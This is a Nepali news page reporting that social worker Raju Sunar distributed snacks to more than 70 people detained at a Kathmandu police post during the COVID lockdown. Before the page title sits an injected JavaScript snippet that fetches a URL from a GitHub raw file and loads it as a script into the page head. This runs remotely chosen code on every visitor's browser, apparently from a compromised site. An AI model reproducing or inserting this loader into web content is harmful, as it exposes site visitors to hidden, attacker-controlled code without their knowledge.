;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); लकडाउनबाट समातिएका ७० बढीलाई समाजसेवी राजु सुनारद्वारा प्रहरी बिटमै खाजा वितरण – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • लकडाउनबाट समातिएका ७० बढीलाई समाजसेवी राजु सुनारद्वारा प्रहरी बिटमै खाजा वितरण
जुनेली बिशेष

लकडाउनबाट समातिएका ७० बढीलाई समाजसेवी राजु सुनारद्वारा प्रहरी बिटमै खाजा वितरण

काठमाडौँ, चैत्र १८

बिश्वोभर फैलिएको कोरोना भाइरसको प्रभाब नेपालमा पनि परेको छ,  यसलाई ध्यानमा राखेर नेपाल सरकारले लक डाउन गरे संगै नेपालका प्रहरीहरु अहोरात्र  जनतालाइ कोरोना भाइरसबाट बचाउन डिउटिमा खटिएका छन् |

यसै क्रममा आफ्नो काम भएर वा नभएर बाहिर निस्केका मानिस हरुलाई प्रहरीले नियन्त्रणमा लिएको थियो | गोकर्नेश्वोर नगरपालिका नयाबस्ती जम्बु डांडा  प्रहरी बिटका दिनभरि भोकै  प्रहरी चौकीमै बसेका ७० भन्दा बढी मानिसलाई  कोंग्रेसका युवा नेता नेपाल  दलित बिधार्थी संघका केन्द्रीय अध्यक्ष एवं समाजसेवी  राजु सुनारले  खाजा स्वरूप चाउचाउ वितरण गरेका हुन् |

“मैले धेरै ठुलो केहि गर्न लागेको हैन सबै मानब हुन्, थोरै भोक मेटाउने प्रयास गरेको” समाजसेवी राजु सुनारले जुनेली न्युजलाई बताए |

फेसबुक प्रतिक्रियाहरु